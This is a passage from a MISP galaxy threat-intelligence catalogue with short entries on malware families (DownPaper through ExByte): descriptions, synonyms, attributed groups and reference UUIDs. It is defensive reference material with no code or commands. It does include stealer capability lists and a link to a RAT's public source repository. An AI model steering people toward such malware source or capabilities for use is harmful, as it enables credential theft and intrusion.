UUID c8149b45-7d28-421e-bc6f-25c4b8698b92 which can be used as unique global reference for Downeks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DownPaper

DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download and run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.

Internal MISP references

UUID 227862fd-ae83-4e3d-bb69-cc1a45a13aed which can be used as unique global reference for DownPaper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DracuLoader

Cyber Defense Institute stated that this shellcode PE loader was observed staging win.hemigate.

Internal MISP references

UUID 5f5e0719-7e2d-4d99-ac60-e9728b58c373 which can be used as unique global reference for DracuLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DramNudge

Internal MISP references

UUID 627a044b-1c84-409c-9f58-95b46d5d51ba which can be used as unique global reference for DramNudge in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge - webarchive

Associated metadata

Metadata key	Value
type	[]

DRATzarus

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DRATzarus.

Known Synonyms
`ThreatNeedle`

Internal MISP references

UUID 1ff3afab-8b3f-4b9c-90c7-61062d2dfe0b which can be used as unique global reference for DRATzarus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DreamBot

2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*) 2014 Dreambot (Gozi ISFB variant)

In 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.

See win.gozi for additional historical information.

Internal MISP references

UUID ac4fbbb0-9a21-49ce-be82-e44cb02a7819 which can be used as unique global reference for DreamBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dridex

OxCERT blog describes Dridex as "an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term." According to MalwareBytes, "Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method." IBM X-Force discovered "a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems."

Internal MISP references

UUID b4216929-1626-4444-bdd7-bfd4b68a766e which can be used as unique global reference for Dridex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DRIFTPIN

Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DRIFTPIN.

Known Synonyms
`Spy.Agent.ORM`
`Toshliph`

Internal MISP references

UUID 76f6f047-1362-4651-bd2f-9ca10c119e8d which can be used as unique global reference for DRIFTPIN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dripion

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dripion.

Known Synonyms
`Masson`

Internal MISP references

UUID a752676f-06c1-426c-9fcb-6c199afc74af which can be used as unique global reference for Dripion in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DriveOcean

Communicates via Google Drive.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DriveOcean.

Known Synonyms
`Google Drive RAT`

Internal MISP references

UUID 730a4e94-4f9b-4f34-a1f3-1c97d341332c which can be used as unique global reference for DriveOcean in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Drokbk

Drokbk stands out for its use of the GitHub platform as part of its C&C infrastructure. This makes it difficult to detect and remove, as GitHub is not traditionally associated with malicious activities.

Drokbk attacks have been linked to the Iranian APT group Nemesis Kitten. This group is believed to use Drokbk for cyberespionage and financial information theft activities.

Internal MISP references

UUID b29c0d53-597d-41c9-a1d0-04dbaa4917f8 which can be used as unique global reference for Drokbk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DropBook

DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts.

Internal MISP references

UUID 8c142a72-0efb-4850-b684-bc6b5300f85e which can be used as unique global reference for DropBook in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DROPSHOT

Internal MISP references

UUID cfdb02f2-a767-4abb-b04c-333a02cdd7e2 which can be used as unique global reference for DROPSHOT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dtrack

Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. Its core functionality includes operations to upload a file to the victim's computer, download a file from the victim's computer, dump disk volume data, persistence and more.

A variant of Dtrack was found on Kudankulam Nuclear Power Plant (KNPP) which was used for a targeted attack.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dtrack.

Known Synonyms
`Preft`
`TroyRAT`

Internal MISP references

UUID 414f95e1-aabe-4aa9-b9be-53e0826f62c1 which can be used as unique global reference for Dtrack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DualToy (Windows)

Internal MISP references

UUID 440daef1-385d-42fd-a714-462590d4ce6b which can be used as unique global reference for DualToy (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkHotel

Internal MISP references

UUID 309d0745-bbfd-43bc-b2c4-511592a475bf which can be used as unique global reference for DarkHotel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DUBrute

Internal MISP references

UUID 2236a08f-dfbd-4f92-9d73-a895c34766ad which can be used as unique global reference for DUBrute in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DUCKTAIL

According to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.

Internal MISP references

UUID 9313d400-2b39-4c0f-a967-554b71a23e70 which can be used as unique global reference for DUCKTAIL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dumador

Internal MISP references

UUID ea59906d-b5e1-4749-8494-9ad9a09510b5 which can be used as unique global reference for Dumador in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador - webarchive

Associated metadata

Metadata key	Value
type	[]

DuQu

Internal MISP references

UUID 7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6 which can be used as unique global reference for DuQu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DUSTMAN

In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named "DUSTMAN" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack "DUSTMAN" after the filename and string embedded in the malware. "DUSTMAN" can be considered as a new variant of "ZeroCleare" malware, published in December 2019.

Internal MISP references

UUID daa3d1e4-9265-4f1c-b1bd-9242ac570681 which can be used as unique global reference for DUSTMAN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DUSTPAN

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DUSTPAN.

Known Synonyms
`StealthVector`

Internal MISP references

UUID c91fb5fa-e682-44c7-8782-70068cb68b24 which can be used as unique global reference for DUSTPAN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DUSTTRAP

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DUSTTRAP.

Known Synonyms
`CurveLoad`
`DodgeBox`
`StealthReacher`

Internal MISP references

UUID cbe10c59-5a0f-4d21-abef-59f4fffe8292 which can be used as unique global reference for DUSTTRAP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Duuzer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Duuzer.

Known Synonyms
`Escad`

Internal MISP references

UUID a5eb921e-17db-46de-a907-09f9ad05a7d7 which can be used as unique global reference for Duuzer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DYEPACK

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DYEPACK.

Known Synonyms
`BanSwift`
`swift`

Internal MISP references

UUID 8420653b-1412-45a1-9a2d-6aa9b9eaf906 which can be used as unique global reference for DYEPACK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DynamicStealer

Dynamic Stealer is a Github Project C# written code by L1ghtN4n. This code collects passwords and uploads these to Telegram. According to Cyble this Eternity Stealer leverages code from this project and also Jester Stealer could be rebranded from it.

Internal MISP references

UUID b8b7b6e3-eef1-43cb-a251-e20a3e57d75e which can be used as unique global reference for DynamicStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dyre

The Dyre Banking Trojan, discovered in June 2014, targets online banking websites for credential theft and fraud. It uses a man-in-the-browser approach, encryption, and spam emails for distribution.

Dyre's architecture includes a dropper and main DLL module, with techniques for persistence and evasion. Its command and control infrastructure is hidden through proxies, and it can adapt using a domain generation algorithm and I2P integration. Researchers have linked Dyre to the Gozi and Neverquest families.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dyre.

Known Synonyms
`Dyreza`

Internal MISP references

UUID 1ecbcd20-f238-47ef-874b-08ef93266395 which can be used as unique global reference for Dyre in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EagerBee

According to Elastic, EagerBee loads additional capabilities using remotely-downloaded PE files, hosted in C2. However, its implementation and coding practices reveal a lack of advanced skills from the author, relying on basic techniques. During their research, they identified string formatting and underlying behavior that aligns with previous research attributed to a Chinese-speaking threat actor referred to as LuckyMouse (APT27, EmissaryPanda).

Internal MISP references

UUID 20615110-ec2a-4ead-a7e4-cadecf1fa6bc which can be used as unique global reference for EagerBee in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EagleMonitorRAT

This RAT written in C# was derived from HorusEyesRat. It was modified by "Arsium" and published on GitHub. There is also a client builder included. Github Source: https://github.com/arsium/EagleMonitorRAT

Internal MISP references

UUID c2839018-3e2a-44ac-9ad6-60dbc0973918 which can be used as unique global reference for EagleMonitorRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EASYNIGHT

FireEye describes EASYNIGHT is a loader observed used with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.

Examples include a patched bcrypt.dll with no other modification than an additional import entry, in the observed case "printwin.dll!gzwrite64" (breaking the file signature).

Internal MISP references

UUID 0277b1e5-ea2d-4dec-bbaa-13e25a2d1f1c which can be used as unique global reference for EASYNIGHT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Easy Stealer

Easy Stealer is a new information stealer written in Golang that is under active development. Since July 2023, the information stealer has been sold on the underground market, advertising a variety of capabilities, such as the ability to target crypto wallets and passwords. Based on VirusTotal data, it appears that developer test samples were uploaded in June 2023. The panel for the stealer is installed on the buyer's own infrastructure, allowing for exclusive control. The stated pricing models are: $35 for 7 days, $115 for 30 days, and $250 for 90 days. Given its user-friendly panel design and the affordable price range, combined with similar capabilities to other information stealers, Easy Stealer is likely to see an increase in distribution among various cyber criminals as it continues through active development.

Internal MISP references

UUID 200c9845-b1d0-4197-85df-b0a9cb78ef6e which can be used as unique global reference for Easy Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Echelon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Echelon.

Known Synonyms
`Echelon-Stealer`

Internal MISP references

UUID e13ae741-a9fe-47f1-8016-e70c9fa7048e which can be used as unique global reference for Echelon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EDA2

EDA2 is a successor of HiddenTear. Just like HiddenTear it was developed as an open-source project by a security researcher and published on Github. It was meant as "educational ransomware" and purposefully had flaws in the encryption process that allow decryption of ransomed files.

This backfired, when threat actors began to modify HiddenTear and EDA2 source code. Some modifications introduced bugs where encrypted files were destroyed, others fixed the encryption flaws and made decryption without a key impossible.

Internal MISP references

UUID 24fe5fef-6325-4c21-9c35-a0ecd185e254 which can be used as unique global reference for EDA2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EDRSilencer

Trend Micro describes EDRSilencer as a red team tool originally designed to interfere with endpoint detection and response solutions via the Windows Filtering Platform, which is actively being used by threat actors.

Internal MISP references

UUID 55108ee8-79c9-4ba7-9725-ec97f0b5293b which can be used as unique global reference for EDRSilencer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Egregor

According to Heimdal, Egregor ransomware infection happens via a loader, then, in the victim’s firewall, it enables the Remote Desktop Protocol. After this part, the malware is free to move inside the victim’s network, identifying and disabling all the antivirus software it can find. The next step is the encryption of the data and the insertion of a ransom note named “RECOVER-FILES.txt” in all the compromised folders.

Internal MISP references

UUID cd84bc53-8684-4921-89c7-2cf49512bf61 which can be used as unique global reference for Egregor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EHDevel

Internal MISP references

UUID 257da597-7e6d-4405-9b10-b4206bb013ca which can be used as unique global reference for EHDevel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ekipa RAT

Internal MISP references

UUID 791a0902-7541-444a-a75e-19be97545917 which can be used as unique global reference for Ekipa RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ELECTRICFISH

The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.

Internal MISP references

UUID 0f5a2ce1-b44f-4088-a4c0-04456a90c174 which can be used as unique global reference for ELECTRICFISH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ElectricPowder

Internal MISP references

UUID 31b18d64-815c-4464-8fcc-f084953a75f5 which can be used as unique global reference for ElectricPowder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Elirks

Elirks is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems. Mostly attacks using Elirks occurring in East Asia. One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS. Attackers create accounts on those services and post encoded IP addresses or the domain names of real C2 servers in advance of distributing the backdoor. Multiple Elirks variants using Japanese blog services for the last couple of years.

Internal MISP references

UUID eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9 which can be used as unique global reference for Elirks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Elise

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Elise.

Known Synonyms
`EVILNEST`

Internal MISP references

UUID 3477a25d-e04b-475e-8330-39f66c10cc01 which can be used as unique global reference for Elise in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ElizaRAT

Internal MISP references

UUID c13fc723-0fd8-4e27-b1d7-a71976ad0268 which can be used as unique global reference for ElizaRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

El Machete APT Backdoor Dropper

This dropper masquerades itself as Adobe software, titled as Adobe.msi. It is used to executes the python written Backdoor used by this threat actor.

Internal MISP references

UUID 66b8cbdc-6190-4568-b615-0ae8a51d2148 which can be used as unique global reference for El Machete APT Backdoor Dropper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ELMER

ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ELMER.

Known Synonyms
`Elmost`

Internal MISP references

UUID e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834 which can be used as unique global reference for ELMER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

emansrepo

Infostealer

Internal MISP references

UUID 0be856c5-66ae-4ad7-bd8d-6794391d33f7 which can be used as unique global reference for emansrepo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Emdivi

Internal MISP references

UUID 6bf7aa6a-3003-4222-805e-776cb86dc78a which can be used as unique global reference for Emdivi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Emissary

Internal MISP references

UUID a171f40a-85eb-4b64-af1d-8860a49b3b40 which can be used as unique global reference for Emissary in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Emmenhtal

Orange Cyberdefense assesses that this loader is highly likely used by multiple financially motivated threat actors since at least February 2024 to deploy commodity RATs and infostealers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Emmenhtal.

Known Synonyms
`IDATDropper`
`PEAKLIGHT`

Internal MISP references

UUID 24d6cedb-a11b-4383-bdb2-3c6c5dcf0e05 which can be used as unique global reference for Emmenhtal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Emotet

While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets. It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time. Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Emotet.

Known Synonyms
`Geodo`
`Heodo`

Internal MISP references

UUID d29eb927-d53d-4af2-b6ce-17b3a1b34fe7 which can be used as unique global reference for Emotet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Empire Downloader

Internal MISP references

UUID aa445513-9616-4f61-a72d-7aff4a10572b which can be used as unique global reference for Empire Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Emudbot

Supposedly a worm that was active around 2012-2013.

Internal MISP references

UUID d3189268-443b-42f6-99a2-12d29f309c0b which can be used as unique global reference for Emudbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Enfal

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Enfal.

Known Synonyms
`Lurid`

Internal MISP references

UUID 2a4cacb7-80a1-417e-8b9c-54b4089f35d9 which can be used as unique global reference for Enfal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Enigma Loader

According to Trend Micro, this is a downloader, dedicated to stage execution of a second stage malware called Enigma Stealer.

Internal MISP references

UUID 7491f483-f3d2-4f90-be19-df1e3783f66f which can be used as unique global reference for Enigma Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Entropy

Entropy is a ransomware first seen in 1st quarter of 2022, is being used in conjunction of Dridex infection. The ransomware uses a custom packer to pack itself which has been seen in some early dridex samples.

Internal MISP references

UUID 8dc64857-abb1-4926-8114-052f9ba4bc33 which can be used as unique global reference for Entropy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EntryShell

Fileless malware 'EntryShell', a variant of the KeyBoy malware, due to similarities in backdoor command IDs and debug messages with old KeyBoy samples. The embedded malware config was encrypted with a unique algorithm.

Internal MISP references

UUID 73a0919b-1c81-4af5-a6d1-8fb5ae951269 which can be used as unique global reference for EntryShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Enviserv

According to Microsoft, Enviserv is a malicious program that is unable to spread of its own accord. It may perform a number of actions of an attacker's choice on an affected computer.

Internal MISP references

UUID 58071588-708d-447d-9fb4-8c9268142c82 which can be used as unique global reference for Enviserv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EnvyScout

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EnvyScout.

Known Synonyms
`ROOTSAW`

Internal MISP references

UUID 0890e245-319d-4291-8f49-21dbc9486181 which can be used as unique global reference for EnvyScout in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Epsilon Red

According to PCrisk, Epsilon is a ransomware-type program. This malware is designed to encrypt the data of infected systems in order to demand payment for decryption.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Epsilon Red.

Known Synonyms
`BlackCocaine`

Internal MISP references

UUID d6d0bf38-c85c-41d3-bc0e-3477b458563e which can be used as unique global reference for Epsilon Red in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Epsilon Stealer

Epsilon Stealer is an information stealer sold as Malware as a Service by a new french actor called "Epsilon". This malware is distributed as a game, mainly on discord, but steals user credentials, crypto wallets, and stored cookies. It evades static detection by being packed with NSIS, which then launches a malicious Electron package.

Internal MISP references

UUID c9babd08-0db1-4004-8664-d1be08cf1db6 which can be used as unique global reference for Epsilon Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EquationDrug

Internal MISP references

UUID c4490972-3403-4043-9d61-899c0a440940 which can be used as unique global reference for EquationDrug in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Equationgroup (Sorting)

Rough collection EQGRP samples, to be sorted

Internal MISP references

UUID 35c1abaf-8dee-48fe-8329-f6e5612eb7af which can be used as unique global reference for Equationgroup (Sorting) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Erbium Stealer

Erbium is an information stealer advertised and sold as a Malware-as-a-Service on cybercrime forums and Telegram since at least July 2022. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.

Internal MISP references

UUID b566fe1f-7ed7-4932-b04d-355facdeab7a which can be used as unique global reference for Erbium Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Erebus (Windows)

Internal MISP references

UUID 06450729-fe60-4348-9717-c13a487738b9 which can be used as unique global reference for Erebus (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eredel

Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.

According to nulled[.]to:

Supported browsers Chromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.

Stealing FileZilla
Stealing an account from Telegram
Stealing AutoFill
Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin
Stealing files from the desktop. Supports any formats, configurable via telegram-bot

Internal MISP references

UUID acd2555d-b4a1-47b4-983a-fb7b3a402dab which can be used as unique global reference for Eredel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Erica Ransomware

Internal MISP references

UUID 0f4731b3-b661-4677-9e51-474504313202 which can be used as unique global reference for Erica Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eris

Ransomware.

Internal MISP references

UUID c4531af6-ab25-4266-af41-e01635a93abe which can be used as unique global reference for Eris in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ESPecter

Internal MISP references

UUID 3e89d4e6-f7bd-44fd-ade9-c3d408ce67fb which can be used as unique global reference for ESPecter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EternalRocks

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EternalRocks.

Known Synonyms
`MicroBotMassiveNet`

Internal MISP references

UUID 10dd9c6a-9baa-40b6-984a-0598c4d9a88f which can be used as unique global reference for EternalRocks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EternalPetya

According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EternalPetya.

Known Synonyms
`BadRabbit`
`Diskcoder.C`
`ExPetr`
`NonPetya`
`NotPetya`
`Nyetya`
`Petna`
`Pnyetya`
`nPetya`

Internal MISP references

UUID 6f736038-4f74-435b-8904-6870ee0e23ba which can be used as unique global reference for EternalPetya in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eternity Clipper

This malware is part of the Eternity Malware "Framework".

Internal MISP references

UUID 283928b7-2820-4230-a012-59302febff90 which can be used as unique global reference for Eternity Clipper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eternity Ransomware

Eternity Framework Ransomware Payload

Internal MISP references

UUID 0554d721-71d7-49ff-965c-1512427b303e which can be used as unique global reference for Eternity Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eternity Stealer

This Stealer is part of the eternity malware project.

Internal MISP references

UUID 94bf44d8-3eb3-42b0-b906-102f2b8548f5 which can be used as unique global reference for Eternity Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eternity Worm

This malware is part of the Eternity Malware "Framework".

Internal MISP references

UUID 9bdffa86-2bed-4d9d-8697-5d70e62015dc which can be used as unique global reference for Eternity Worm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EtumBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EtumBot.

Known Synonyms
`HighTide`

Internal MISP references

UUID 91af1080-6378-4a90-ba1e-78634cd31efe which can be used as unique global reference for EtumBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Evilbunny

Internal MISP references

UUID dc39dcdf-50e7-4d55-94a0-926853f344f3 which can be used as unique global reference for Evilbunny in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EvilExtractor

Internal MISP references

UUID e020212b-03ef-4168-97f5-bb72ff627d94 which can be used as unique global reference for EvilExtractor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EvilGrab

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilGrab.

Known Synonyms
`Vidgrab`

Internal MISP references

UUID 438c6d0f-03f0-4b49-89d2-40bf5349c3fc which can be used as unique global reference for EvilGrab in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EVILNUM (Windows)

Internal MISP references

UUID da922c36-ca13-4ea2-a22d-471e91ddac93 which can be used as unique global reference for EVILNUM (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EvilPlayout

A wiper used against in an attack against Iran’s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.

Internal MISP references

UUID a90a1c08-00ea-49ad-8f79-9a4461fce48e which can be used as unique global reference for EvilPlayout in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EvilPony

Privately modded version of the Pony stealer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular EvilPony.

Known Synonyms
`CREstealer`

Internal MISP references

UUID e26579d9-1d93-4a3b-a41e-263254d85189 which can be used as unique global reference for EvilPony in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Evrial

Internal MISP references

UUID af3a3ece-e67f-457a-be72-7651bc720342 which can be used as unique global reference for Evrial in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Exaramel (Windows)

Internal MISP references

UUID dd68abd7-b20a-40a5-be53-ae8d45c1dd27 which can be used as unique global reference for Exaramel (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ExByte

ExByte is a custom data exfiltration tool and infostealer observed being used during BlackByte ransomware attacks.

Internal MISP references

